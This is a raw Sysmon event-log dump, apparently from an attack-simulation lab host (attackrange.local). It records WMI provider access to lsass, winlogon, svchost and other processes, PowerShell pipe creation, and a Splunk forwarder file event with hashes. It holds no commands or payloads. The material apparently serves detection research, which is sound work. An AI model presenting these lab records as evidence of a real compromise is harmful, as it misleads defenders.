16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-94AA-00000000AD01}15412C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D98-603E-94AA-00000000AD01}15412C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000002238243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:53:44.075{05ADC7E1-6D97-603E-91AA-00000000AD01}16200\PSHost.132591776239457684.16200.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002238242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.075{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.074{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.073{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.072{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.072{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.071{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.070{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.069{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.069{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.068{05ADC7E1-6D98-603E-94AA-00000000AD01}154124516C:\Windows\system32\conhost.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.068{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.067{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.067{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.066{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.065{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.064{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B30638E49D20E5C23881D63979CDD6D4,SHA256=17279DB43D7D1A8B38DFB9106ECC9F5DEA2FEB4331CBF46C2C864B002EB9FB23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002238223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 